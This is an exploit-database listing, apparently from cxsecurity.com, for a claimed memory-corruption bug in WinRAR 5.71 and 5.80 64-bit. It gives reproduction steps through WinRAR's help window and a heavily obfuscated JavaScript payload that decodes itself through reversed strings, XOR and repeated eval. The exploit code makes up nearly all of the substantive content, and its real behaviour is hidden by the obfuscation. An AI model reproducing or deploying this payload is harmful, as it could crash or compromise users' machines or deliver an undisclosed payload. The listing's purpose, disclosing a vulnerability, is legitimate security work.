winrar 5.71 & 5.80 64bit memory corruption

2019.10.22
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: [winrar 5.71 & 5.80 64bit memory corruption] # Exploit Author: albalawi -s # Software Link: [https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe] # Version: [5.80] # Tested on: [Microsoft Windows Version 10.0.18362.418 64bit] #https://twitter.com/test_app_______ ------------------------------------------------ 1- open winrar or any file.rar 2- help 3- help topics 4- Drag the exploit to the window poc video: https://www.youtube.com/watch?v=NVDVP33kHuU -------------------------------------------------- Save the content html ****************************************** <script type="text/javascript"> //<![CDATA[ <!-- var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" + "harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+ "\\\\,l=x.length;for(i=0;i<l;i++){y%=127;o+=String.fromCharCode(x.charCodeAt" + "(i)^(y++));}return o;}f(\\\"\\\\K_RG^Q[B\\\\\\\\031OKSOYQP\\\\\\\\027b}*7))" + "x\\\\\\\\033:\\\\\\\\025$w!(:.p9&'$x3&-0,f\\\\\\\\000\\\\\\\\177&r\\\\\\\\0" + "25\\\\\\\\000O\\\\\\\\000\\\\\\\\013\\\\\\\\010\\\\\\\\026\\\\\\\\006\\\\\\" + "\\034\\\\\\\\000\\\\\\\\010\\\\\\\\007\\\\\\\\t1LO\\\\\\\\023\\\\\\\\036\\\\"+ "\\\\034\\\\\\\\007\\\\\\\\021\\\\\\\\033\\\\\\\\002J$[3>AE\\\\\\\\\\\"\\\\\\"+ "\\\\\\\\\"\\\\?^qXk:jm}k+dyz\\\\\\\\177=tcf}c+K:\\\\\\\\\\\\\\\\bkuo{l|\\\\" + "\\\\003\\\\\\\\002@KKRBF]\\\\\\\\027w\\\\\\\\016\\\\\\\\000\\\\\\\\037s\\\\" + "\\\\022\\\\\\\\017nAh[\\\\\\\\nUW]C\\\\\\\\005`ObQ|2!1-52g$($,9,)*m\\\\\\\\" + "rp\\\\\\\\005\\\\\\\\026\\\\\\\\0065%1).u\\\\\\\\0313=0\\\\\\\\004\\\\\\\\0" + "04>AZ9\\\\\\\\024;\\\\\\\\0065\\\\\\\\0307\\\\\\\\002MNO4\\\\\\\\030\\\\\\\\"+ "037S\\\\\\\\007\\\\\\\\035\\\\\\\\032WX%\\\\\\\\010'\\\\\\\\022]^ Rgw$vnk(4" + "*H~ho{u^pyqvb?D;Mh\\\\\\\\177owoT\\\\\\\\017qKAIJ{\\\\\\\\n\\\\\\\\000\\\\\\"+ "\\n\\\\\\\\013p_rA\\\\\\\\020\\\\\\\\021\\\\\\\\022pUYZ\\\\\\\\027KQV\\\\\\" + "\\025nHP\\\\\\\\027\\\\\\\\034c\\\\\\\\036a\\\\\\\\030g%*,g/3)\\\\\\\\021l\\"+ "\\\\\\023r\\\\\\\\rpztu\\\\\\\\n%\\\\\\\\0047z{|\\\\\\\\016;+@\\\\\\\\022\\" + "\\\\\\n\\\\\\\\017DXF)\\\\\\\\007\\\\\\\\035\\\\\\\\002\\\\\\\\002\\\\\\\\0" + "02\\\\\\\\nNOPQ.\\\\\\\\001(\\\\\\\\033VWX%\\\\\\\\010'\\\\\\\\022AQsbpjtq8" + "[zUd7\\\\\\\\177n|f`e2gmes*D;n~di1uAWCPGWOW\\\\\\\\\\\\\\\\u\\\\\\\\010\\\\" + "\\\\025p_rAVD\\\\\\\\\\\\\\\\P@\\\\\\\\\\\\\\\\YY\\\\\\\\030\\\\\\\\\\\\\\\\"+ "B\\\\\\\\023\\\\\\\\025\\\\\\\\035Ec2\\\\\\\\035,\\\\\\\\03703'5h+?-*(<omq\\"+ "\\\\\\016q\\\\\\\\010wm\\\\\\\\013*\\\\\\\\0054\\\\\\\\007(;1-@I\\\\\\\\024" + "\\\\\\\\002\\\\\\\\026E\\\\\\\\017GUIZPL\\\\\\\\004NSPDBCDEFGCY\\\\\\\\023P" + "WT^{]p_jYr[|k\\\\\\\\177mjh|/;,2O6m\\\\\\\\\\\"\\\\&D;!GnApCT\\\\\\\\\\\\\\" + "\\~QxKzS^HX\\\\\\\\013NXHIUC\\\\\\\\000\\\\\\\\023\\\\\\\\t\\\\\\\\025TB^__" + "I\\\\\\\\007aLc.\\\\\\\\0356%+7fo!iwk|vn&pmrfdefgcy3pwt~$<\\\\\\\\023>\\\\\\"+ "\\r8\\\\\\\\021:\\\\\\\\023\\\\\\\\n\\\\\\\\034\\\\\\\\014\\\\\\\\r\\\\\\\\" + "t\\\\\\\\037\\\\\\\\\\\\\\\\O[LR\\\\\\\\021\\\\\\\\001\\\\\\\\023\\\\\\\\02" + "0\\\\\\\\022\\\\\\\\nB&\\\\\\\\t \\\\\\\\023\\\\\\\\\\\"\\\\t|^qXkZslfi~ah`" + "{>e{gxp6*8{o}zxl-\\\\\\\\033}P\\\\\\\\177JXzUtG\\\\\\\\026\\\\\\\\004_N\\\\" + "\\\\\\\\\\\\F@E\\\\\\\\014\\\\\\\\017\\\\\\\\033]SV\\\\\\\\\\\\\\\\\\\\\\\\" + "007\\\\\\\\006YSYG\\\\\\\\037//.,%!{\\\\\\\\033j,2ce\\\\\\\\021lq\\\\\\\\01" + "4#\\\\\\\\016=hz7i\\\\\\\\004+\\\\\\\\0065`r<0\\\\\\\\004\\\\\\\\030\\\\\\\\"+ "\\\\\\\\?\\\\\\\\0269\\\\\\\\010[G\\\\\\\\001\\\\\\\\036\\\\\\\\006\\\\\\\\" + "000SLFKAI\\\"\\\\,47)\\\"(f};)lo,0(rtsbus.o nruter};)i(tArahc.x=+o{)--i;0=>" + "i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)74=!)31/l(tAedoCrahc.x(elihw;lo=l,ht" + "gnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\")" ; while(x=eval(x)); //--> //]]> </script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top